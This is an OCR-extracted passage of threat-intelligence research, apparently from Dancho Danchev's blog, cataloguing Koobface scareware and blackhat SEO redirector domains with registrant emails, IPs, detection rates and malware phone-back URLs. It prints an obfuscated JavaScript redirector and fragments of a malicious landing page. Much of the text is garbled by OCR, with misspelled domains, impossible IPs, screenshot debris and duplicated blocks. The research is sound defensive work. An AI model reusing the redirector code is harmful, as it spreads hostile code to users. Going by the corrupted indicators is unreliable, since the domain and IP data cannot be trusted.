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Active scareware domains. portfolio (blackhat SEO/Koobface pushed) 
[22]212.150.164.190 - AS1680 - NV-ASN 013 NetVision Ltd : 
antispy-download .org - Email: robertsimonkroon@gmail.com 
scanner-virus-free .org - Email: robertsimonkroon@gmail.com 
tube-best-porn .org - Email: robertsimonkroon@gmail.com 
tube-sex-porn .org - Email: robertsimonkroon@gmail.com 
download-free-files .org - Email: robertsimonkroon@gmail.com 
tube-porn-best .org - Email: robertsimonkroon@gmail.com 
scan-your-pc-now .org - Email: michaeltycoon@gmail.com 
scanner-virus-free .com - Email: robertsimonkroon@gmail.com 
tube-sex-porn .com - Email: robertsimonkroon@gmail.com 
scanner-free-virus .com - Email: robertsimonkroon@gmail.com 
tube-porn-best .com - Email: robertsimonkroon@gmail.com 
antispy-download .info - Email: robertsimonkroon@gmail.com 
soft-download-free .info - Email: robertsimonkroon@gmail.com 
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parked 


at 


scanner-virus-free .info - Email: robertsimonkroon@gmail.com 
scanner-free-virus .info - Email: robertsimonkroon@gmail.com 
scan-your-pc-now .info - Email: michaeltycoon@gmail.com 


adult-tube-free .net - Email: michaeltycoon@gmail.com 
scanner-virus-free .net - Email: robertsimonkroon@gmail.com 
tube-sex-porn .net - Email: robertsimonkroon@gmail.com 
download-free-files .net - Email: michaeltycoon@gmail.com 
scanner-free-virus .net - Email: robertsimonkroon@gmail.com 
tube-porn-best .net - Email: robertsimonkroon@gmail.com 
ekjsoft .eu - Email: robertsimonkroon@gmail.com 
antispy-download .biz - Email: robertsimonkroon@gmail.com 
soft-download-free .biz - Email: robertsimonkroon@gmail.com 
scanner-virus-free .biz - Email: robertsimonkroon@gmail.com 
free-malware-scan .biz - Email: robertsimonkroon@gmail.com 
tube-best-porn .biz - Email: robertsimonkroon@gmail.com 
tube-sex-porn .biz - Email: robertsimonkroon@gmail.com 
download-free-files .biz - Email: michaeltycoon@gmail.com 
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scanner-free-virus .biz - Email: robertsimonkroon@gmail.com 
download-free-soft .biz - Email: robertsimonkroon@gmail.com 
tube-porn-best .biz - Email: robertsimonkroon@gmail.com 
scan-your-pc-now .biz - Email: michaeltycoon@gmail.com 
porn-tube-sex .biz - Email: robertsimonkroon@gmail.com 
alrzsoft .in - Email: petrenko.kolia@yandex.ru 
antispy-download .biz - Email: robertsimonkroon@gmail.com 
cool-tube-porn .net - Email: robertsimonkroon@gmail.com 
cool-tube-porn .org - Email: robertsimonkroon@gmail.com 
download-free-now .net - Email: robertsimonkroon@gmail.com 
download-free-now .org - Email: robertsimonkroon@gmail.com 
download-free-soft .com - Email: robertsimonkroon@gmail.com 
download-free-soft .net - Email: robertsimonkroon@gmail.com 
download-scaner-free .com - Email: robertsimonkroon@gmail.com 
ekjsoft .eu 
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fdglsoft .in - Email: petrenko.kolia@yandex.ru 
free-virus-scanner .net - Email: robertsimonkroon@gmail.com 
kleqsoft .in - Email: petrenko.kolia@yandex.ru 
kitysoft .in - Email: petrenko.kolia@yandex.ru 
ktyjsoft .in - Email: petrenko.kolia@yandex.ru 


my films 


my films 


Yougmt 


Broadcast Yourself bi 


i) @ 0:00 / 0:00 


kyezsoft .in - Email: petrenko.kolia@yandex.ru 

Ikrjsoft .in - Email: petrenko.kolia@yandex.ru 

Ikrtsoft .in - Email: petrenko.kolia@yandex.ru 

mgtlsoft .in - Email: petrenko.kolia@yandex.ru 

porn-sex-tube .net - Email: robertsimonkroon@gmail.com 
porn-sex-tube .org - Email: robertsimonkroon@gmail.com 
scan-free-malware .net - Email: robertsimonkroon@gmail.com 
scan-free-malware .org - Email: robertsimonkroon@gmail.com 
spyware-scaner-free .com - Email: robertsimonkroon@gmail.com 
spyware-scaner-free .info - Email: robertsimonkroon@gmail.com 
spyware-scaner-free .net - Email: robertsimonkroon@gmail.com 
spyware-scaner-free .org - Email: robertsimonkroon@gmail.com 
tube-best-porn .biz - Email: robertsimonkroon@gmail.com 
tube-best-porn .com - Email: robertsimonkroon@gmail.com 
tube-best-porn .net - Email: robertsimonkroon@gmail.com 
tube-best-porn .org - Email: robertsimonkroon@gmail.com 


+ 


co) os 
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tube-porn-sex .info - Email: robertsimonkroon@gmail.com 
tube-porn-sex .net - Email: robertsimonkroon@gmail.com 
tube-porn-sex .org - Email: robertsimonkroon@gmail.com 


What’s so special about the robertsimonkroon@gmail.com email anyway? It’s the fact 
that not only was [23]the email was once again used to register [24]scareware domains two 
times in July, 2009, but also, as pointed out in November 2009’s "[25]Koobface Botnet’s 
Scareware Business Model - Part Two", the same email was used to register the following 
download locations for scareware domains pushed by the Koobface botnet: 


Oni901s3feu60 .cn - Email: robertsimonkroon@gmail.com 
6j5aq93iu7yv4 .cn - Email: robertsimonkroon@gmail.com 
mf6gy4lj79ny5 .cn - Email: robertsimonkroon@gmail.com 
84u9wb2hsh4pe .cn - Email: robertsimonkroon@gmail.com 
6pj2h8rqkhfw7 .cn - Email: robertsimonkroon@gmail.com 
7cib5fzf462g8 .cn - Email: robertsimonkroon@gmail.com 
7bs5nfzfkp8q8 .cn - Email: robertsimonkroon@gmail.com 
kt4Ilwumfhjb7a .cn - Email: robertsimonkroon@gmail.com 
q2bfOfzvjb5ca .cn - Email: robertsimonkroon@gmail.com 
rncocnspr44va .cn - Email: robertsimonkroon@gmail.com 
tleayoft9226b .cn - Email: robertsimonkroon@gmail.com 
4g04i9n76ttwd .cn - Email: robertsimonkroon@gmail.com 
kzvi4iiutr11le .cn - Email: robertsimonkroon@gmail.com 
hxc7jitg7k57e .cn - Email: robertsimonkroon@gmail.com 
mfbj6pquvjv8e .cn - Email: robertsimonkroon@gmail.com 
mt3pvkfmpi7de .cn - Email: robertsimonkroon@gmail.com 
fb7pxcqyb45oe .cn - Email: robertsimonkroon@gmail.com 
fyivbri3bOdyf .cn - Email: robertsimonkroon@gmail.com 
z6ailnvi94jgg .cn - Email: robertsimonkroon@gmail.com 
ue4x08f5myqdl .cn - Email: robertsimonkroon@gmail.com 
p7keflvui9fkl .cn - Email: robertsimonkroon@gmail.com 
gjpwsc5p7oe3m .cn - Email: robertsimonkroon@gmail.com 
fluqidfi3qkcm .cn - Email: robertsimonkroon@gmail.com 
7mx1z5jqOnt3o .cn - Email: robertsimonkroon@gmail.com 
3uxyctrimiqeo .cn - Email: robertsimonkroon@gmail.com 
pOumob9k2g7mp .cn - Email: robertsimonkroon@gmail.com 
od32qjx6megqos .cn - Email: robertsimonkroon@gmail.com 
bnfdxhaelrgey .cn - Email: robertsimonkroon@gmail.com 
7zju2182i2zhz .cn - Email: robertsimonkroon@gmail.com 


Stay tuned for a massive Koobface related activities update, analyzing the gang’s 
multi-tasking throughout the entire January, 2010 - descriptive historical OSINT 
offers long-term value in cross-checking for connections. 


Related Koobface gang/botnet research: 

[26]How the Koobface Gang Monetizes Mac OS X Traffic 

[27]The Koobface Gang Wishes the Industry "Happy Holidays" 
[28]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[29]Koobface Botnet Starts Serving Client-Side Exploits 

[30]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
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[31]Koobface Botnet’s Scareware Business Model - Part Two 
[32]Koobface Botnet’s Scareware Business Model - Part One 
[33]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[34]New Koobface campaign spoofs Adobe’s Flash updater 
[35]Social engineering tactics of the Koobface botnet 
[36]Koobface Botnet Dissected in a TrendMicro Report 
[37]Movement on the Koobface Front - Part Two 
[38]Movement on the Koobface Front 

[39]Koobface - Come Out, Come Out, Wherever You Are 
[40]Dissecting Koobface Worm’s Twitter Campaign 


The Diverse Portfolio of Fake Security Software Series: 

[41]A Diverse Portfolio of Fake Security Software - Part Twenty Four 
[42]A Diverse Portfolio of Fake Security Software - Part Twenty Three 
[43]A Diverse Portfolio of Fake Security Software - Part Twenty Two 
[44]A Diverse Portfolio of Fake Security Software - Part Twenty One 
[45]A Diverse Portfolio of Fake Security Software - Part Twenty 
[46]A Diverse Portfolio of Fake Security Software - Part Nineteen 
[47]A Diverse Portfolio of Fake Security Software - Part Eighteen 
[48]A Diverse Portfolio of Fake Security Software - Part Seventeen 
[49]A Diverse Portfolio of Fake Security Software - Part Sixteen 
[50]A Diverse Portfolio of Fake Security Software - Part Fifteen 
[51]A Diverse Portfolio of Fake Security Software - Part Fourteen 
[52]A Diverse Portfolio of Fake Security Software - Part Thirteen 
[53]A Diverse Portfolio of Fake Security Software - Part Twelve 
[54]A Diverse Portfolio of Fake Security Software - Part Eleven 
[55]A Diverse Portfolio of Fake Security Software - Part Ten 

[56]A Diverse Portfolio of Fake Security Software - Part Nine 

[57]A Diverse Portfolio of Fake Security Software - Part Eight 

[58]A Diverse Portfolio of Fake Security Software - Part Seven 
[59]A Diverse Portfolio of Fake Security Software - Part Six 

[60]A Diverse Portfolio of Fake Security Software - Part Five 

[61]A Diverse Portfolio of Fake Security Software - Part Four 

[62]A Diverse Portfolio of Fake Security Software - Part Three 
[63]A Diverse Portfolio of Fake Security Software - Part Two 
[64]Diverse Portfolio of Fake Security Software 


This post has been reproduced from [65]Dancho Danchev’s blog. Follow him [66]on Twitter. 


. http://blogs.zdnet.com/security/?p=429 
. http://en. wikipedia. org/wiki/Opportunity_cost 
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35. http://content.zdnet .com/2346-12691_22-352597 .htm 
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6.2.6 A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the 
Koobface Gang (2010-02-04 00:50) 


<script>(L! 

// KROTEG(L! 

var aQcSeS2 = [[L! 

("fdaicdqe lbonnopqqdk.nllpeplojdpm".replace (/(diqlnpj)+/g,""),'fb2'),! 
["tkpabfgpbgqnrerd.bkrcknomkh".replace(/[kpbfqnrh]+/q,""),'tg'], 

("flgr ibabegngkdhjabsbbtaelrkk.bhgchombb”. replace (/(lgbakh}j)+/g,""),'fr'),! 
["mrdkjyisfdjdphgfabrcbfeil. lcejonqmdaj".replace({/(rdkjfhgbilng] +/g,""),'ms'],! 
("masqpqlfiaqnakdbsb. qjcgofemgh”.replace (/ [aqfdbjgeh) +/g,""),'ms'), 0! 
["ljjnkb.jipcemousb". replace (/[jbipcou] +/g,""),'ms'], 
("mlpygjtfyfgnefqqanqrnjbpfoloiikji.ngjdcjfoqhma”. replace (/[ilpgjfnqidh)+/g,""),'yb'), 
("fpiudkb lanhirg. pikickhoqlm"”.replace(/[pidklnhgq] +/g,""),'fu'], 
("talwihtgtgedbrdp.benaqoamatfk".replace(/[alhgdbpnqfk] +/g,""),'tw'j, 

("hj inbfSe.npscgnogugmjj".replace(/[jnbfepsgu] +/g,""),'hiS'], 
("bpiedukbugioruhh.klceftnonlfpmhna".replace(/[pidukgrhlftna] +/g,""),'be'] | 

): 

var bidf814 = [| 

Ven. + U“ZOS 21e.or. » 

'86.7' + '4.167.16', [LI 

Ur a a OY er 4 UES ah 4 Jeg i Le 

640i" + "Oo tis 225", 

MOS kia) ont) eee OGLE 

"215." + "42.668).143', 

TG te: CMGI 2ehe aly ue 

'67.64.' + '119.34', CLI 

19o8,' + §'251.116.116", 

'109" + *.65.36.143", 

177.206." + §2155.216", 

'99)." + §166.73.29", 1 
N66.Gre + S21 b62" ou 
'99.' + '97.80.182', 
'6S.67.' + '19.204', cI 
Set: UGA aaa e, 
'SG6pa0 + UZ ist neas!, 
Wi Vir fc a ae Bes rea Ht fe Ue 
'68.80' + '.233.49', (LI 
LOF 96! & ' 232.202", 
); 


With [1]scareware/rogueware/fake security software continuing to be the cash-cow choice for 
the Koobface gang, keeping them on a short leash in order to become the biggest [2]opportu- 
nity cost for the gang’s business model is crucial. The following are currently active blackhat 
SEO redirectors/Koobface-infected hosts redirectors and actual scareware domains courtesy 
of the gang. 
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head> 
title>Loading</titlhe 
meta name*"robots” content*"noindex, nofollow, noarchive” 


script 
script type="text / javascript ™>docwrent.write(*<OBI"+' ECT id="a'+' ie" wicth="0" height="0" style="positionsabsolute; left:O;top:07" CLAS" +'SID="CL3'+" TI 
script Languages" )av ” FL Rus 

script language=")jav 
var isIE = (navigaté ion. indexOr ("MSIE") '= -1 true 1 false: 
ar is¥in = (n ‘ 


Blackhat SEO redirectors, also embedded at Koobface-infected hosts, with identical redirector 
ID (?pid=312s02 &sid=4db12f): 

freeticketwin.com - 91.212.226.25 - Email: test@now.net.cn 
lotteryvideowin.com - Email: test@now.net.cn 
videohototplaypoker.com - Email: test@now.net.cn 
financetopsecrets.com - Email: test@now.net.cn 
how2winforex.com - 91.212.226.136 - Email: test@now.net.cn 
2money4money.com - Email: test@now.net.cn 
get-money-quickly.com - Email: test@now.net.cn 

fordusedsales .com - 193.104.106.250 - Email: test@now.net.cn 
buylexuscustoms .com - 911.212.226.185 - Email: test@now.net.cn 
tracegirlsonline .com - 89.248.168.22 - Email: test@now.net.cn 
skypetollfree .com - 96.44.128.245 - Email: test@now.net.cn 
dendy-trens .com - Email: test@now.net.cn 

pretendtolove .com - Email: test@now.net.cn 

bewareoffreebies .com - Email: test@now.net.cn 
harry-the-potter .com - Email: test@now.net.cn 
getlancomediscount .com - Email: baldwinnere@yahoo.co.uk 
vincentvangoghsite .com - Email: contacts@ferra.hu 
jacksonpollocksite .com - Email: contacts@ferra.hu 

lady2gaga .com - Email: contacts@designt.de 
nigeriaworldtours .com Email: info@montever.de 
americanpiemusicvideo .com - Email: mail@suvtrip.hu 
superstitionmusicvideo .com - Email: mail@suvtrip.hu 
umbrellamusicvideo .com - Email: mail@suvtrip.hu 
discounts-org .com - Email: mail@haselbladtour.com 
littlediscounts .com - Email: mail@haselbladtour.com 
winterdiscounts5 .com - Email: mail@haselbladtour.com 
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chevroletwmodelteys.com 
delhiwebcameracom A 
discounts-org.com 
discounts22.com 
global-d-securitycom 
jacksonpollocksite. com 
lexusbestparts.com 
max6antispyware.com 


megal-scannercom 
A 96.44.128.0/18 ——“S-ge 4522298 


. Ni 
mega2-scannercom A 96.44.128.245 = 


mega4-scannercom 


hosted.by.qudranetcom 


mega6-scannercom 
mega?-scannercom 
microantivirus-scanner0.com 
microantitusscannerl.com 
microanthitusscanner2. com 
pro-2inl-securityh.com 
spy-detectoracom 


Z3-antispyware.com 


chevroletvmodeltoys .com - Email: CourtneyRWebb@aol.com 
volvomodeltoys .com - Email: CourtneyRWebb@aol.com 
manilawebcamera .com - Email: monkey22@live.com 
mumbaiwebcamera .com - Email: monkey22@live.com 
karachiwebcamera .com - Email: monkey22@live.com 
delhiwebcamera .com - Email: monkey22@live.com 
istanbulwebcamera .com - Email: monkey22@live.com 
lexusmodeltoys .com - Email: monkey22@live.com 
chevroletvmodeltoys .com - Email: CourtneyRWebb@aol.com 
bmwmodeltoys .com - Email: CourtneyRWebb@aol.com 


Upon redirection, the scareware is served from malware-b-scan .com - 96.44.128.245; 
91.212.226.97; 91.212.226.185; 91.121.45.67, 91.212.226.203, 94.228.209.195 - Email: 
mail@bristonnews.com. 
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Sample detection rate for newly introduced scareware samples: [3]Setup _312s2.exe - 
Result: 3/40 (7.5 %), [4]Setup _312s2.exe - Result: 4/39, [5]Setup _312s22.exe - Result: 2/39 
(5.13 %), [6]Setup _312s2.exe - Result: 6/39 (15.39 %), [7]Setup _312s2.exe - Result: 1/40 
(2.5 %), [8]Setup _312s2.exe - Result: 1/39 (2.56 %), [9]Setup _312s2.exe - Result: 3/39 (7.7 
%). [10]Setup _312s2.exe - Result: 4/40 (10 %), [11]Setup _312s2.exe - Result: 1/40 (2.5 %), 
[12]Setup _312s2.exe - Result: 4/40 (10 %), [13]Setup _312s2.exe - Result: 5/41 (12.2 %), 
[14]Setup _312s2.exe - Result: 5/41 (12.2 %), [15]Setup _312s2.exe - Result: 5/41 (12.2 %), 
[16]Setup _312s2.exe - Result: 4/41 (9.76 %), [17]Setup _312s2.exe - Result: 4/41 (9.76 %), 
[18]Setup _312s2.exe - Result: 5/41 (12.2 %), [19]Setup _312s2.exe - Result: 4/41 (9.76 %), 
[20]Setup 312s2.exe - Result: 3/41 (7.32 %), [21]Setup _312s2.exe - Result: 6/41 (14.63 %), 
[22]Setup 312s2.exe - Result: 11/41 (26.83 %), [23]Setup _312s2.exe - Result: 4/42 (9.53 
%). 


Upon execution the sample phones back to winxp7server .com/download/winlogo.bmp 
- 94.228.208.57; rescuesysupdate .com/?b=312s2 - 83.133.125.216. The most recent 
samples (Wednesday, February 10, 2010) phone back to wintimeserver .com/?b=312s2 - 
91.212.226.125 and firmwaredownloadserver .com/download/winlogo.obmp - 94.228.208.57. 
The most recent samples (Sunday, February 21, 2010) phone back to firmwaredown- 
loadserver.com /download/winlogo.bmp - 94.228.208.57; | shifustserver.com /down- 
load/winlogo.bmp - 94.228.208.5/94.228.208.57 - Email: viinzer@hotmail.com 


The most recent samples (Friday, February 12, 2010) phone back to firmwaredownload- 
server .com/download/winlogo.bmp - 94.228.208.57; checklatestversion .com/?b=312s - 
109.232.225.75. 


The most recent samples (Wednesday, February 24, 2010) phone back to shifust- 
server.com/download/winlogo.bmp - 94.228.208.57 - Email: viinzer@hotmail.com and 
version-upgrade.com/?b=312s12 - 89.248.168.21. Parked on the same IP are also checklat- 
estversion.com and fastwinupdates.com. 
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antispywareObscan.com 
artspywareito9. com 
antivirus -for-pt-2.com 
antivirus for pc-4.com A 
antivirus -for-pc-6.com 
antivirus for pc-8.com 
antvirusproBscan.com 
@@ra-antiirus-scani.com 
extra-security-scanbl com 
fun-anthirusscand.com 


fun-antiresscani com 


“ 
ET 91212226209 > a 921.212.226.024 ——Ai-ge asss77 
fun-antivitusscan3.com 2 


fun-antnesscans com 4 | 
fun-anthitusscans.com 4, 
( 

funantveusscand.com 

funantveusscand.com 

funantveusscan4.com 

funantveusscand.com 
Securepro-antiirusi.com 
super-scanner-2004.com 


top rateanivirus0.com 


topantimalware-scanner?.com 


Parked on the same IPs are more scareware domains part of the portfolio: 
interlLantivirus.com - 87.98.130.232- Email: test@now.net.cn 
virus-scan-d.com - 87.98.130.232 - Email: test@now.net.cn 
bl9-virus-scanner.com - 87.98.130.232 - Email: test@now.net.cn 
intera-antivirus.com - 87.98.130.232 - Email: test@now.net.cn 
interc-antivirus.com - 87.98.130.232 - Email: test@now.net.cn 
interd-antivirus.com - 87.98.130.232 - Email: test@now.net.cn 
intere-antivirus.com - 87.98.130.232 - Email: test@now.net.cn 
inter-antivirus.com - 87.98.130.232 - Email: test@now.net.cn 
interLantivirus.com - 87.98.130.232 - Email: test@now.net.cn 
195.5.161.107/psx1/?vih==RANDOM _STRINGS - no domain name 
91.212.132.241 /psx1/?vih==RANDOM _STRINGS 

195.5.161.105 /psx1/?vih==RANDOM STRINGS 
non-antivirus-scan .com - Email: test@now.net.cn 
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zin-antivirus-scan .com - Email: test@now.net.cn 
nextgen-scannert .com - Email: test@now.net.cn 
protection15scan .com - Email: test@now.net.cn 
nitro-antispyware .com - Email: test@now.net.cn 
z2-antispyware .com - Email: test@now.net.cn 
spy-detectore .com - Email: admin@clossingt.com 
dis7-antivirus .com - Email: admin@vertigosmart.com 
v2comp-scanner .com - Email: admin@vertigosmart.com 
new-av-scannere .com - Email: missbarlingmail@aol.com 
smartvirus-scan6 .com - Email: info@terranova.com 
spywaremaxscan4 .com - Email: out@trialzoom.com 
super6antispyware .com - Email: mail@ordercom.com 
spyware-max-scan3 .com - Email: out@trialzoom.com 


max-antivirus-security5 .com - Email: mail@dynadoter.com 


winterdiscounts5 .com - Email: mail@haselbladtour.com 
11-antivirus .com - Email: call555call@live.com 
l-antivirus .com - Email: call555call@live.com 
1m-online-scanner .com - Email: stellar2@yahoo.com 
2m-online-scanner .com - Email: stellar2@yahoo.com 
2pro-antispyware .com - Email: mail@yahoo.com 
3pro-antispyware .com - Email: mail@yahoo.com 
6-antivirus .com - Email: call555call@live.com 
7-antivirus .com - Email: call555call@live.com 
9-antivirus .com - Email: call555call@live.com 
a0-online-scanner .com - Email: stellar2@yahoo.com 
a9-online-scanner .com - Email: stellar2@yahoo.com 
aa-antivirus .com - Email: call555call@live.com 
aa-online-scanner .com - Email: call555call@live.com 
ab-antivirus .com - Email: call555call@live.com 
ac-antivirus .com - Email: call555call@live.com 
ad-antivirus .com - Email: call555call@live.com 
advl1-system-scanner .com - Email: JayRKibbe@live.com 
adv2-system-scanner .com - Email: JayRKibbe@live.com 
ae-antivirus .com - Email: call555call@live.com 
antivirus-expert-a .com - Email: 900ekony@live.com 
antivirus-expert-i .com - Email: 900ekony@live.com 
antivirus-expert-r .com - Email: 900ekony@live.com 
antivirus-expert-y .com - Email: 900ekony@live.com 
antivirussystemscan1 .com - Email: 900ekony@live.com 
antivirussystemscana .com - Email: 900ekony@live.com 
army-antispywarea .com - Email: beliec99@yahoo.com 
army-antispywarei .com - Email: beliec99@yahoo.com 
army-antispywarel .com - Email: beliec99@yahoo.com 
army-antispywarep .com - Email: beliec99@yahoo.com 
army-antivirusa .com - Email: beliec99@yahoo.com 
army-antivirusd .com - Email: beliec99@yahoo.com 
army-antivirust .com - Email: beliec99@yahoo.com 
army-antivirusv .com - Email: beliec99@yahoo.com 
army-antivirusy .com - Email: beliec99@yahoo.com 
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b1-online-scanner .com - Email: stellar2@yahoo.com 
best-antiviruskO .com 

bestpd-virusscanner .com - Email: SusanCWagner@yahoo.com 
bestpr-virusscanner .com - Email: SusanCWagner@yahoo.com 
crystal-antimalware .com - Email: mail@vertigocats.com 
crystal-antivirus .com - Email: mail@vertigocats.com 
crystal-pro-scan .com - Email: mail@vertigocats.com 
crystal-pro-scanner .com - Email: mail@vertigocats.com 
crystal-spyscanner .com - Email: mail@vertigocats.com 
crystal-threatscanner .com - Email: mail@vertigocats.com 
crystal-virusscanner .com - Email: mail@vertigocats.com 
extra-spyware-defencea .com - Email: fabula8@live.com 
extra-spyware-defenceb .com - Email: fabula8@live.com 
malware-a-scan .com - Email: mail@bristonnews.com 
malware-b-scan .com - Email: mail@bristonnews.com 
malware-c-scan .com - Email: mail@bristonnews.com 
malware-d-scan .com - Email: mail@bristonnews.com 
malware-t-scan .com - Email: mail@bristonnews.com 
mega-antispywarea .com - Email: fabula8@live.com 
mega-antispywareb .com - Email: fabula8@live.com 
mm-online-scanner .com - Email: stellar2@yahoo.com 
my-computer-antivirusa .com - Email: dillinzer1@yahoo.com 
my-computer-antivirusb .com - Email: dillinzer1@yahoo.com 
my-computer-antiviruse .com - Email: dillinzerl1@yahoo.com 
my-computer-antivirusq .com - Email: dillinzer1@yahoo.com 
my-computer-antivirusw .com - Email: dillinzer1@yahoo.com 
my-computer-scanc .com - Email: clintommail2@yahoo.com 
my-computer-scane .com - Email: clintommail2@yahoo.com 
my-computer-scanl .com - Email: clintommail2@yahoo.com 
my-computer-scannera .com - Email: clintommail2@yahoo.com 
my-computer-scannerl .com - Email: clintommail2@yahoo.com 
my-computer-scannerm .com - Email: clintommail2@yahoo.com 
my-computer-scannern .com - Email: clintommail2@yahoo.com 
my-computer-scannerv .com - Email: clintommail2@yahoo.com 


my-computer-scanw .com - Email: clintommail2@yahoo.com 
my-pc-online-scanm .com - Email: dillinzerl1@yahoo.com 
my-pc-online-scann .com - Email: dillinzer1@yahoo.com 
my-pc-online-scanr .com - Email: dillinzerl1@yahoo.com 
my-pc-online-scanv .com - Email: dillinzerl1@yahoo.com 
nl-system-scanner .com - Email: JayRKibbe@live.com 
n2-system-scanner .com - Email: JayRKibbe@live.com 
nasa-antivirusl .com - Email: call555call@live.com 
nasa-antivirus3 .com - Email: call555call@live.com 
nasa-antivirusa .com - Email: call555call@live.com 
nasa-antivirusb .com - Email: call555call@live.com 
nasa-antiviruso .com - Email: call555call@live.com 
pcl-system-scanner .com - Email: JayRKibbe@live.com 
pc2-system-scanner .com - Email: JayRKibbe@live.com 
pro0-antivirus .com - Email: mail@yahoo.com 
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proO-system-scanner .com - Email: JayRKibbe@live.com 
prol-system-scanner .com - Email: JayRKibbe@live.com 
pro2-antivirus .com - Email: mail@yahoo.com 

pro4-antivirus .com - Email: mail@yahoo.com 

pro6-antivirus .com - Email: mail@yahoo.com 

pro8-antivirus .com - Email: mail@yahoo.com 
remote-antispywarec .com - Email: teresa2mail.me@live.com 
remote-antispywared .com - Email: teresa2mail.me@live.com 
remote-antispywaree .com - Email: teresa2mail.me@live.com 
remote-antispywarey .com - Email: teresa2mail.me@live.com 
remote-pcl-scanner .com - Email: teresa2mail.me@live.com 
remote-pc-scannera .com - Email: teresa2mail.me@live.com 
remote-pc-scannerr .com - Email: teresa2mail.me@live.com 
remote-pc-scannerv .com - Email: teresa2mail.me@live.com 
remote-pc-scannery .com - Email: teresa2mail.me@live.com 


run-antivirusscan0,com 


run-antivirusscanl,com 
run-antivirusscan3.com 
run-antivirusscan6.com 


run-antivirusscan8.com 


94.228.209.195 94.228.208.0/20 ——42-g» as47869 


runantivirusscan0.com 
runantivirusscan3.com 
runantivirusscan4.com 
runantivirusscan9.com 


securepro-antivirus1.com 


scan3antispyware .com - Email: o@mozzilastuf.com 
scan6antispyware .com - Email: o@mozzilastuf.com 
scan8antispyware .com - Email: o@mozzilastuf.com 
scan-antispywarea .com - Email: o@mozzilastuf.com 
scan-antispywarec .com - Email: o@mozzilastuf.com 
scan-antispywared .com - Email: o@mozzilastuf.com 
scan-antispywarez .com - Email: o@mozzilastuf.com 
spyware-01-scanner .com - Email: mail@bristonnews.com 
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spyware-03-scanner .com - Email: mail@bristonnews.com 
spyware-05-scanner .com - Email: mail@bristonnews.com 
spyware-06-scanner .com - Email: mail@bristonnews.com 
spyware-07-scanner .com - Email: mail@bristonnews.com 
stcanning-your-computerc .com - Email: mitra66@yahoo.com 
stcanning-your-computerd .com - Email: mitra66@yahoo.com 
stcanning-your-computerq .com - Email: mitra66@yahoo.com 
stcanning-your-computerr .com - Email: mitra66@yahoo.com 
stcanning-your-computert .com - Email: mitra66&@yahoo.com 
stcanning-your-pca .com - Email: mitra66&@yahoo.com 
stcanning-your-pcb .com - Email: mitra66@yahoo.com 
stcanning-your-pcc .com - Email: mitra66@yahoo.com 
stcanning-your-pcd .com - Email: mitra66@yahoo.com 
stcanning-your-pce .com - Email: mitra66@yahoo.com 


stealthv1l-antispyware 
stealthv2-antispyware 
stealthv7-antispyware 
stealthv8-antispyware 
stealthv9-antispyware 


.com - Email: SteveLCartwright@yahoo.com 
.com - Email: SteveLCartwright@yahoo.com 
.com - Email: SteveLCartwright@yahoo.com 
.com - Email: SteveLCartwright@yahoo.com 
.com - Email: SteveLCartwright@yahoo.com 


verl-system-scanner .com - Email: JayRKibbe@live.com 
ver2-system-scanner .com - Email: JayRKibbe@live.com 


virus-al-scanner .com - 
virus-al-scanner .com - 
virus-b1-scanner .com - 
virus-b1-scanner .com - 
virus-cl-scanner .com - 
virus-cl-scanner .com - 
virus-d1-scanner .com - 
virus-d1-scanner .com - 
virus-e2-scanner .com - 
virus-e2-scanner .com - 


Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 


windowsv5-antispyware .com - Email: SteveLCartwright@yahoo.com 
windowsv6-antispyware .com - Email: SteveLCartwright@yahoo.com 
windowsv7-antispyware .com - Email: SteveLCartwright@yahoo.com 
windowsv8-antispyware .com - Email: SteveLCartwright@yahoo.com 
windowsv9-antispyware .com - Email: SteveLCartwright@yahoo.com 
z0-online-scanner .com - Email: stellar2@yahoo.com 

z1-online-scanner .com - Email: stellar2@yahoo.com 
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Active scareware domains. portfolio (blackhat SEO/Koobface pushed) parked 
[24]212.150.164.190 - AS1680 - NV-ASN 013 NetVision Ltd : 
antispy-download .org - Email: robertsimonkroon@gmail.com 
scanner-virus-free .org - Email: robertsimonkroon@gmail.com 
tube-best-porn .org - Email: robertsimonkroon@gmail.com 
tube-sex-porn .org - Email: robertsimonkroon@gmail.com 
download-free-files .org - Email: robertsimonkroon@gmail.com 
tube-porn-best .org - Email: robertsimonkroon@gmail.com 
scan-your-pc-now .org - Email: michaeltycoon@gmail.com 
scanner-virus-free .com - Email: robertsimonkroon@gmail.com 
tube-sex-porn .com - Email: robertsimonkroon@gmail.com 
scanner-free-virus .com - Email: robertsimonkroon@gmail.com 
tube-porn-best .com - Email: robertsimonkroon@gmail.com 
antispy-download .info - Email: robertsimonkroon@gmail.com 
soft-download-free .info - Email: robertsimonkroon@gmail.com 


at 
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scanner-virus-free .info - Email: robertsimonkroon@gmail.com 
scanner-free-virus .info - Email: robertsimonkroon@gmail.com 
scan-your-pc-now .info - Email: michaeltycoon@gmail.com 


adult-tube-free .net - Email: michaeltycoon@gmail.com 
scanner-virus-free .net - Email: robertsimonkroon@gmail.com 
tube-sex-porn .net - Email: robertsimonkroon@gmail.com 
download-free-files .net - Email: michaeltycoon@gmail.com 
scanner-free-virus .net - Email: robertsimonkroon@gmail.com 
tube-porn-best .net - Email: robertsimonkroon@gmail.com 
ekjsoft .eu - Email: robertsimonkroon@gmail.com 
antispy-download .biz - Email: robertsimonkroon@gmail.com 
soft-download-free .biz - Email: robertsimonkroon@gmail.com 
scanner-virus-free .biz - Email: robertsimonkroon@gmail.com 
free-malware-scan .biz - Email: robertsimonkroon@gmail.com 
tube-best-porn .biz - Email: robertsimonkroon@gmail.com 
tube-sex-porn .biz - Email: robertsimonkroon@gmail.com 
download-free-files .biz - Email: michaeltycoon@gmail.com 
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scanner-free-virus .biz - Email: robertsimonkroon@gmail.com 
download-free-soft .biz - Email: robertsimonkroon@gmail.com 
tube-porn-best .biz - Email: robertsimonkroon@gmail.com 
scan-your-pc-now .biz - Email: michaeltycoon@gmail.com 
porn-tube-sex .biz - Email: robertsimonkroon@gmail.com 
alrzsoft .in - Email: petrenko.kolia@yandex.ru 
antispy-download .biz - Email: robertsimonkroon@gmail.com 
